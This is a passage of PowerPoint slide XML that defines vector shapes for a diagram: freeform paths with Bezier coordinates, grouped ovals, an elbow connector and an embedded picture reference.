                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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83" name="Freeform 1779">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE01BFD-2A49-4066-80EA-DA5697415BE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20" y="2772"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 230 h 230"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 48 h 230"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 230"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 182 h 230"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 23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5" h="230">
                    <a:moveTo>
                      <a:pt x="175" y="230"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="23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1B171B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84" name="Freeform 1780">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E013F20D-733C-4CA8-A391-85A3C2C7316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129" y="2694"/>
                <a:ext cx="72" cy="58"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 137 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 114"/>
                  <a:gd name="T2" fmla="*/ 141 w 141"/>
                  <a:gd name="T3" fmla="*/ 6 h 114"/>
                  <a:gd name="T4" fmla="*/ 93 w 141"/>
                  <a:gd name="T5" fmla="*/ 48 h 114"/>
                  <a:gd name="T6" fmla="*/ 52 w 141"/>
                  <a:gd name="T7" fmla="*/ 104 h 114"/>
                  <a:gd name="T8" fmla="*/ 44 w 141"/>
                  <a:gd name="T9" fmla="*/ 107 h 114"/>
                  <a:gd name="T10" fmla="*/ 32 w 141"/>
                  <a:gd name="T11" fmla="*/ 114 h 114"/>
                  <a:gd name="T12" fmla="*/ 26 w 141"/>
                  <a:gd name="T13" fmla="*/ 96 h 114"/>
                  <a:gd name="T14" fmla="*/ 23 w 141"/>
                  <a:gd name="T15" fmla="*/ 88 h 114"/>
                  <a:gd name="T16" fmla="*/ 11 w 141"/>
                  <a:gd name="T17" fmla="*/ 62 h 114"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 50 h 114"/>
                  <a:gd name="T20" fmla="*/ 20 w 141"/>
                  <a:gd name="T21" fmla="*/ 43 h 114"/>
                  <a:gd name="T22" fmla="*/ 37 w 141"/>
                  <a:gd name="T23" fmla="*/ 70 h 114"/>
                  <a:gd name="T24" fmla="*/ 41 w 141"/>
                  <a:gd name="T25" fmla="*/ 79 h 114"/>
                  <a:gd name="T26" fmla="*/ 85 w 141"/>
                  <a:gd name="T27" fmla="*/ 31 h 114"/>
                  <a:gd name="T28" fmla="*/ 137 w 141"/>
                  <a:gd name="T2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1" h="114">
                    <a:moveTo>
                      <a:pt x="137" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="6"/>
                      <a:pt x="141" y="6"/>
                      <a:pt x="141" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="14"/>
                      <a:pt x="110" y="28"/>
                      <a:pt x="93" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="66"/>
                      <a:pt x="61" y="85"/>
                      <a:pt x="52" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="107"/>
                      <a:pt x="44" y="107"/>
                      <a:pt x="44" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="110"/>
                      <a:pt x="34" y="113"/>
                      <a:pt x="32" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="110"/>
                      <a:pt x="29" y="105"/>
                      <a:pt x="26" y="96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19" y="77"/>
                      <a:pt x="15" y="69"/>
                      <a:pt x="11" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="57"/>
                      <a:pt x="5" y="52"/>
                      <a:pt x="0" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="44"/>
                      <a:pt x="14" y="42"/>
                      <a:pt x="20" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="45"/>
                      <a:pt x="32" y="54"/>
                      <a:pt x="37" y="70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52" y="61"/>
                      <a:pt x="67" y="46"/>
                      <a:pt x="85" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="16"/>
                      <a:pt x="121" y="6"/>
                      <a:pt x="137" y="0"/>
                    </a:cubicBezTo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pic>
          <p:nvPicPr>
            <p:cNvPr id="2079" name="Picture 3" descr="E:\haja Premium\Wireless\Orange.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9D9DD0-EF6D-4C4E-A882-4E2F7602F9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79547" y="2120342"/>
              <a:ext cx="1137533" cy="113753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2080" name="Elbow Connector 502">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC20C16B-89DA-44BF-A4AF-6925AF52A512}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3087188" y="2469556"/>
              <a:ext cx="1554480" cy="845598"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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81" name="Freeform 403">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2316AC34-C013-4E63-88A6-B616F73FB336}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7595292" y="1570155"/>
              <a:ext cx="1751075" cy="469374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chemeClr val="bg1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082" name="Group 520">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F546CB-2EAF-4EBD-9DBB-2F1170C9AD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94607" y="1541530"/>
              <a:ext cx="368300" cy="368300"/>
              <a:chOff x="1403" y="3341"/>
              <a:chExt cx="498" cy="498"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2262" name="Group 521">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{209A2DCE-F786-45BE-A9C6-F1FC944EAD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03" y="3341"/>
                <a:ext cx="498" cy="498"/>
                <a:chOff x="1625" y="1092"/>
                <a:chExt cx="787" cy="787"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2264" name="Oval 522">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5E15BE-EF7F-4B26-B2B5-C8E3357B23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1625" y="1092"/>
                  <a:ext cx="787" cy="787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DDDDDD"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="DDDDDD">
                        <a:gamma/>
                        <a:shade val="46275"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="54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65" name="Oval 523">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284AC98E-D77D-497E-872B-9DDD669B95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1651" y="1118"/>
                  <a:ext cx="735" cy="735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DDDDDD"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="DDDDDD">
                        <a:gamma/>
                        <a:shade val="56078"/>
                        <a:invGamma/>
                      </a:srgbClr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66" name="Freeform 524">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C7E13C-F98E-4794-B042-DEE31D86F4F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51" y="1118"/>
                  <a:ext cx="734" cy="435"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 531 w 1063"/>
                    <a:gd name="T1" fmla="*/ 363 h 629"/>
                    <a:gd name="T2" fmla="*/ 1054 w 1063"/>
                    <a:gd name="T3" fmla="*/ 629 h 629"/>
                    <a:gd name="T4" fmla="*/ 1063 w 1063"/>
                    <a:gd name="T5" fmla="*/ 531 h 629"/>
                    <a:gd name="T6" fmla="*/ 531 w 1063"/>
                    <a:gd name="T7" fmla="*/ 0 h 629"/>
                    <a:gd name="T8" fmla="*/ 0 w 1063"/>
                    <a:gd name="T9" fmla="*/ 531 h 629"/>
                    <a:gd name="T10" fmla="*/ 9 w 1063"/>
                    <a:gd name="T11" fmla="*/ 629 h 629"/>
                    <a:gd name="T12" fmla="*/ 531 w 1063"/>
                    <a:gd name="T13" fmla="*/ 363 h 6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63" h="629">
                      <a:moveTo>
                        <a:pt x="531" y="363"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="748" y="363"/>
                        <a:pt x="940" y="468"/>
                        <a:pt x="1054" y="629"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1059" y="597"/>
                        <a:pt x="1063" y="564"/>
                        <a:pt x="1063" y="531"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1063" y="238"/>
                        <a:pt x="825" y="0"/>
                        <a:pt x="531" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="238" y="0"/>
                        <a:pt x="0" y="238"/>
                        <a:pt x="0" y="531"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="564"/>
                        <a:pt x="3" y="597"/>
                        <a:pt x="9" y="629"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="468"/>
                        <a:pt x="314" y="363"/>
                        <a:pt x="531" y="36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969696">
                        <a:gamma/>
                        <a:tint val="10196"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="969696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263" name="Freeform 525">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21263377-7BDE-45B8-A700-825B01B27E38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1565" y="3403"/>
                <a:ext cx="174" cy="374"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 628 w 1705"/>
                  <a:gd name="T1" fmla="*/ 3624 h 3670"/>
                  <a:gd name="T2" fmla="*/ 414 w 1705"/>
                  <a:gd name="T3" fmla="*/ 3299 h 3670"/>
                  <a:gd name="T4" fmla="*/ 509 w 1705"/>
                  <a:gd name="T5" fmla="*/ 2983 h 3670"/>
                  <a:gd name="T6" fmla="*/ 808 w 1705"/>
                  <a:gd name="T7" fmla="*/ 2861 h 3670"/>
                  <a:gd name="T8" fmla="*/ 1061 w 1705"/>
                  <a:gd name="T9" fmla="*/ 3057 h 3670"/>
                  <a:gd name="T10" fmla="*/ 1381 w 1705"/>
                  <a:gd name="T11" fmla="*/ 3247 h 3670"/>
                  <a:gd name="T12" fmla="*/ 1672 w 1705"/>
                  <a:gd name="T13" fmla="*/ 3047 h 3670"/>
                  <a:gd name="T14" fmla="*/ 1600 w 1705"/>
                  <a:gd name="T15" fmla="*/ 2709 h 3670"/>
                  <a:gd name="T16" fmla="*/ 1403 w 1705"/>
                  <a:gd name="T17" fmla="*/ 2470 h 3670"/>
                  <a:gd name="T18" fmla="*/ 1361 w 1705"/>
                  <a:gd name="T19" fmla="*/ 2425 h 3670"/>
                  <a:gd name="T20" fmla="*/ 996 w 1705"/>
                  <a:gd name="T21" fmla="*/ 1902 h 3670"/>
                  <a:gd name="T22" fmla="*/ 952 w 1705"/>
                  <a:gd name="T23" fmla="*/ 1830 h 3670"/>
                  <a:gd name="T24" fmla="*/ 865 w 1705"/>
                  <a:gd name="T25" fmla="*/ 1835 h 3670"/>
                  <a:gd name="T26" fmla="*/ 681 w 1705"/>
                  <a:gd name="T27" fmla="*/ 1626 h 3670"/>
                  <a:gd name="T28" fmla="*/ 468 w 1705"/>
                  <a:gd name="T29" fmla="*/ 1126 h 3670"/>
                  <a:gd name="T30" fmla="*/ 408 w 1705"/>
                  <a:gd name="T31" fmla="*/ 871 h 3670"/>
                  <a:gd name="T32" fmla="*/ 484 w 1705"/>
                  <a:gd name="T33" fmla="*/ 778 h 3670"/>
                  <a:gd name="T34" fmla="*/ 489 w 1705"/>
                  <a:gd name="T35" fmla="*/ 732 h 3670"/>
                  <a:gd name="T36" fmla="*/ 347 w 1705"/>
                  <a:gd name="T37" fmla="*/ 48 h 3670"/>
                  <a:gd name="T38" fmla="*/ 42 w 1705"/>
                  <a:gd name="T39" fmla="*/ 367 h 3670"/>
                  <a:gd name="T40" fmla="*/ 104 w 1705"/>
                  <a:gd name="T41" fmla="*/ 1177 h 3670"/>
                  <a:gd name="T42" fmla="*/ 532 w 1705"/>
                  <a:gd name="T43" fmla="*/ 2043 h 3670"/>
                  <a:gd name="T44" fmla="*/ 798 w 1705"/>
                  <a:gd name="T45" fmla="*/ 2327 h 3670"/>
                  <a:gd name="T46" fmla="*/ 1078 w 1705"/>
                  <a:gd name="T47" fmla="*/ 2488 h 3670"/>
                  <a:gd name="T48" fmla="*/ 1300 w 1705"/>
                  <a:gd name="T49" fmla="*/ 2457 h 3670"/>
                  <a:gd name="T50" fmla="*/ 1299 w 1705"/>
                  <a:gd name="T51" fmla="*/ 2458 h 3670"/>
                  <a:gd name="T52" fmla="*/ 1354 w 1705"/>
                  <a:gd name="T53" fmla="*/ 2517 h 3670"/>
                  <a:gd name="T54" fmla="*/ 1542 w 1705"/>
                  <a:gd name="T55" fmla="*/ 2745 h 3670"/>
                  <a:gd name="T56" fmla="*/ 1608 w 1705"/>
                  <a:gd name="T57" fmla="*/ 3027 h 3670"/>
                  <a:gd name="T58" fmla="*/ 1386 w 1705"/>
                  <a:gd name="T59" fmla="*/ 3180 h 3670"/>
                  <a:gd name="T60" fmla="*/ 1115 w 1705"/>
                  <a:gd name="T61" fmla="*/ 3015 h 3670"/>
                  <a:gd name="T62" fmla="*/ 827 w 1705"/>
                  <a:gd name="T63" fmla="*/ 2796 h 3670"/>
                  <a:gd name="T64" fmla="*/ 458 w 1705"/>
                  <a:gd name="T65" fmla="*/ 2939 h 3670"/>
                  <a:gd name="T66" fmla="*/ 349 w 1705"/>
                  <a:gd name="T67" fmla="*/ 3318 h 3670"/>
                  <a:gd name="T68" fmla="*/ 578 w 1705"/>
                  <a:gd name="T69" fmla="*/ 3670 h 3670"/>
                  <a:gd name="T70" fmla="*/ 628 w 1705"/>
                  <a:gd name="T71" fmla="*/ 3624 h 3670"/>
                  <a:gd name="T72" fmla="*/ 1340 w 1705"/>
                  <a:gd name="T73" fmla="*/ 2252 h 3670"/>
                  <a:gd name="T74" fmla="*/ 1458 w 1705"/>
                  <a:gd name="T75" fmla="*/ 2373 h 3670"/>
                  <a:gd name="T76" fmla="*/ 1559 w 1705"/>
                  <a:gd name="T77" fmla="*/ 2153 h 3670"/>
                  <a:gd name="T78" fmla="*/ 1406 w 1705"/>
                  <a:gd name="T79" fmla="*/ 1926 h 3670"/>
                  <a:gd name="T80" fmla="*/ 1235 w 1705"/>
                  <a:gd name="T81" fmla="*/ 1708 h 3670"/>
                  <a:gd name="T82" fmla="*/ 1044 w 1705"/>
                  <a:gd name="T83" fmla="*/ 1763 h 3670"/>
                  <a:gd name="T84" fmla="*/ 1340 w 1705"/>
                  <a:gd name="T85" fmla="*/ 2252 h 3670"/>
                  <a:gd name="T86" fmla="*/ 620 w 1705"/>
                  <a:gd name="T87" fmla="*/ 748 h 3670"/>
                  <a:gd name="T88" fmla="*/ 792 w 1705"/>
                  <a:gd name="T89" fmla="*/ 647 h 3670"/>
                  <a:gd name="T90" fmla="*/ 754 w 1705"/>
                  <a:gd name="T91" fmla="*/ 373 h 3670"/>
                  <a:gd name="T92" fmla="*/ 697 w 1705"/>
                  <a:gd name="T93" fmla="*/ 106 h 3670"/>
                  <a:gd name="T94" fmla="*/ 468 w 1705"/>
                  <a:gd name="T95" fmla="*/ 26 h 3670"/>
                  <a:gd name="T96" fmla="*/ 473 w 1705"/>
                  <a:gd name="T97" fmla="*/ 194 h 3670"/>
                  <a:gd name="T98" fmla="*/ 620 w 1705"/>
                  <a:gd name="T99" fmla="*/ 748 h 36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05" h="3670">
                    <a:moveTo>
                      <a:pt x="628" y="3624"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="538" y="3526"/>
                      <a:pt x="448" y="3419"/>
                      <a:pt x="414" y="3299"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="387" y="3202"/>
                      <a:pt x="422" y="3084"/>
                      <a:pt x="509" y="2983"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="543" y="2944"/>
                      <a:pt x="665" y="2819"/>
                      <a:pt x="808" y="2861"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="909" y="2890"/>
                      <a:pt x="990" y="2979"/>
                      <a:pt x="1061" y="3057"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1133" y="3136"/>
                      <a:pt x="1240" y="3236"/>
                      <a:pt x="1381" y="3247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1506" y="3257"/>
                      <a:pt x="1636" y="3167"/>
                      <a:pt x="1672" y="3047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1705" y="2938"/>
                      <a:pt x="1656" y="2801"/>
                      <a:pt x="1600" y="2709"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1545" y="2620"/>
                      <a:pt x="1473" y="2544"/>
                      <a:pt x="1403" y="2470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1361" y="2425"/>
                      <a:pt x="1361" y="2425"/>
                      <a:pt x="1361" y="2425"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1218" y="2270"/>
                      <a:pt x="1106" y="2081"/>
                      <a:pt x="996" y="1902"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="981" y="1878"/>
                      <a:pt x="966" y="1854"/>
                      <a:pt x="952" y="1830"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="1805"/>
                      <a:pt x="895" y="1837"/>
                      <a:pt x="865" y="1835"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="1827"/>
                      <a:pt x="720" y="1698"/>
                      <a:pt x="681" y="1626"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="595" y="1467"/>
                      <a:pt x="526" y="1297"/>
                      <a:pt x="468" y="1126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="443" y="1054"/>
                      <a:pt x="394" y="948"/>
                      <a:pt x="408" y="871"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="415" y="828"/>
                      <a:pt x="446" y="796"/>
                      <a:pt x="484" y="778"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="508" y="767"/>
                      <a:pt x="495" y="756"/>
                      <a:pt x="489" y="732"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="428" y="510"/>
                      <a:pt x="362" y="279"/>
                      <a:pt x="347" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="91"/>
                      <a:pt x="67" y="211"/>
                      <a:pt x="42" y="367"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="631"/>
                      <a:pt x="38" y="921"/>
                      <a:pt x="104" y="1177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="1492"/>
                      <a:pt x="330" y="1788"/>
                      <a:pt x="532" y="2043"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="613" y="2144"/>
                      <a:pt x="702" y="2240"/>
                      <a:pt x="798" y="2327"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="880" y="2401"/>
                      <a:pt x="965" y="2474"/>
                      <a:pt x="1078" y="2488"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1152" y="2498"/>
                      <a:pt x="1230" y="2485"/>
                      <a:pt x="1300" y="2457"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1299" y="2458"/>
                      <a:pt x="1299" y="2458"/>
                      <a:pt x="1299" y="2458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="2517"/>
                      <a:pt x="1354" y="2517"/>
                      <a:pt x="1354" y="2517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1421" y="2588"/>
                      <a:pt x="1491" y="2662"/>
                      <a:pt x="1542" y="2745"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1589" y="2820"/>
                      <a:pt x="1634" y="2940"/>
                      <a:pt x="1608" y="3027"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1580" y="3117"/>
                      <a:pt x="1479" y="3187"/>
                      <a:pt x="1386" y="3180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1270" y="3171"/>
                      <a:pt x="1176" y="3082"/>
                      <a:pt x="1115" y="3015"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1034" y="2927"/>
                      <a:pt x="946" y="2830"/>
                      <a:pt x="827" y="2796"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="704" y="2760"/>
                      <a:pt x="566" y="2814"/>
                      <a:pt x="458" y="2939"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="3057"/>
                      <a:pt x="316" y="3198"/>
                      <a:pt x="349" y="3318"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="387" y="3452"/>
                      <a:pt x="482" y="3565"/>
                      <a:pt x="578" y="3670"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="628" y="3624"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1340" y="2252"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1375" y="2296"/>
                      <a:pt x="1413" y="2340"/>
                      <a:pt x="1458" y="2373"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1524" y="2324"/>
                      <a:pt x="1619" y="2243"/>
                      <a:pt x="1559" y="2153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1508" y="2077"/>
                      <a:pt x="1458" y="2002"/>
                      <a:pt x="1406" y="1926"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1362" y="1860"/>
                      <a:pt x="1309" y="1746"/>
                      <a:pt x="1235" y="1708"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1170" y="1675"/>
                      <a:pt x="1101" y="1735"/>
                      <a:pt x="1044" y="1763"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1934"/>
                      <a:pt x="1220" y="2104"/>
                      <a:pt x="1340" y="2252"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="620" y="748"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="725"/>
                      <a:pt x="771" y="717"/>
                      <a:pt x="792" y="647"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="817" y="568"/>
                      <a:pt x="771" y="450"/>
                      <a:pt x="754" y="373"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="736" y="284"/>
                      <a:pt x="716" y="195"/>
                      <a:pt x="697" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="674" y="0"/>
                      <a:pt x="549" y="12"/>
                      <a:pt x="468" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="460" y="81"/>
                      <a:pt x="466" y="139"/>
                      <a:pt x="473" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="497" y="384"/>
                      <a:pt x="554" y="569"/>
                      <a:pt x="620" y="748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083" name="Group 828">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2454145-366D-4BDC-952B-7CDAC7C215B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36206" y="1510034"/>
              <a:ext cx="481013" cy="388938"/>
              <a:chOff x="2154" y="1819"/>
              <a:chExt cx="217" cy="176"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2234" name="Group 829">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6805EE76-C3F4-4D15-9D6B-2987CE8E74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54" y="1862"/>
                <a:ext cx="217" cy="133"/>
                <a:chOff x="1977" y="2705"/>
                <a:chExt cx="897" cy="548"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2250" name="Freeform 830">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE64DB8-CAF1-403B-B4D1-530AA9BA929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977" y="2787"/>
                  <a:ext cx="45" cy="321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3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3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51" name="Freeform 831">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7F9DFF7-2374-4FA4-94AD-ADD71E1C73B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022" y="2787"/>
                  <a:ext cx="46" cy="321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3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3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52" name="Freeform 832">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CCB85D-8DB5-4E75-B915-00087DC9085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74" y="2932"/>
                  <a:ext cx="45" cy="321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53" name="Freeform 833">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA066A14-7970-486A-8A6D-EDDACBEF149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29" y="2932"/>
                  <a:ext cx="45" cy="321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54" name="Freeform 834">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B43DE66-5DB8-4CBE-AE23-F7FE3A16F28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29" y="2866"/>
                  <a:ext cx="45" cy="321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55" name="Freeform 835">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B14B9011-774B-43F1-B6CD-D0440999F4C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2866"/>
                  <a:ext cx="49" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 13"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
